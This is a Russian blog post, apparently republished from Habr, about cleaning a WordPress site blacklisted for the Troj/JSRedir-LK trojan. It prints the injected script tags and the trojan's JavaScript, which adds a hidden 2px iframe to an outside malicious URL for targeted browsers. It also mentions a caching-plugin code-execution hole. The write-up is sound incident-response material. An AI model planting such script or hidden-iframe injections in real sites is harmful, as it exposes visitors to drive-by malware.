- PVSM.RU - https://www.pvsm.ru -
Буквально сегодня закончила разбираться с интересной и новой для себя задачкой — подопечный сайт оказался в блэклисте яндекса. Причина — троян Troj/JSRedir-LK (по данным компании Sophos).
Уточню: в блэклисте оказались сразу два сайта, один из которых является поддоменом второго, и ниже я опишу, какие трансформации произошли с обоими в результате действия трояна.
А произошло вот что:
в файле header.php (subdomain) появилось два скрипта,
<script type="text/javascript" src="http://ligaexpress.ru/wp-includes/google-analytics.php"></script>
и
<script type="text/javascript" src="http://My-Main-Domain.ru/wp-includes/google-analytics.php"></script>
,
в файле footer.php (subdomain) перед </html>
— также скрипт со ссылкой на ligaexpress,
и в папке wp-includes родительского сайта (domain) — файл google-analytics.php, заканчивающийся следующим кодом:
function showBrowVer()
{
var data = browserDetectNav();
if (data[0]) {
if ((data[0] == 'Opera' || data[0] == 'MSIE'|| (data[0] == 'Firefox' & data[1] <= 17)) & data[3] == 'Windows'){
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://moradomedia.nl/new/php/one-style.php';
js_kod2.width = '2px';
js_kod2.height = '2px';
js_kod2.style = 'visibility: hidden;';
document.body.appendChild(js_kod2);
}
}
}
Что любопытно, ссылка js_kod2.src периодически менялась.
Еще любопытно, что кроме того самого Sophos'а ни один из использованных антивирусов ничего не нашел. Ни на сайте, ни на компьютере, который я после возни с сайтом решила проверить. Зато софосовская утилита Virus Removal Tool нашла тот самый Troj/JSRedir-LK, и вдобавок еще и Troj/JSRedir-JK, оба в Temporary Internet Files. За что я ее теперь всячески рекомендую [1].
А также порекомендую плагин для вордпресса Wordfence Security [2]. Меня он покорил возможностью просканировать файлы, включая файлы темы и плагинов, и сравнить их с хранящимися на WordPress.org. Даже жаль, что к моменту его установки и запуска сканирования все лишнее уже было удалено.
И еще о вордпресс (о той самой уязвимости, упомянутой в теме статьи).
Пока искала дыру, через которую проник вирус, нашла информацию о том, что в плагинах для кеширования (а именно WP Super Cache 1.2 и более ранние; W3 Total Cache 0.9.2.8 и более ранние) обнаружена уязвимость, позволяющая удаленному пользователю внедрить и выполнить произвольный PHP код. Подробнее об этом можно прочитать здесь [3] и здесь [4].
Так что держите ноги в тепле, а плагины — обновленными. А, да, и не храните ftp пароли в Total Commander.
Спасибо за внимание.
Ссылки на упомянутое в тексте:
1. Virus Removal Tool от Sophos (free) [1]
2. Плагин Wordfence Security для WordPress [2]
3. Обнаружена опасная уязвимость в кеширующих плагинах для WordPress, securitylab.ru [3]
4. mfunc issue [4]
Автор: Aireen
Источник [5]
Сайт-источник PVSM.RU: https://www.pvsm.ru
Путь до страницы источника: https://www.pvsm.ru/bezopasnost/37056
Ссылки в тексте:
[1] Virus Removal Tool от Sophos (free): http://www.sophos.com/en-us/products/free-tools/virus-removal-tool.aspx
[2] Плагин Wordfence Security для WordPress: http://wordpress.org/plugins/wordfence/
[3] Обнаружена опасная уязвимость в кеширующих плагинах для WordPress, securitylab.ru: http://www.securitylab.ru/news/439825.php
[4] mfunc issue: http://wordpress.org/support/topic/pwn3d
[5] Источник: http://habrahabr.ru/post/184124/
Нажмите здесь для печати.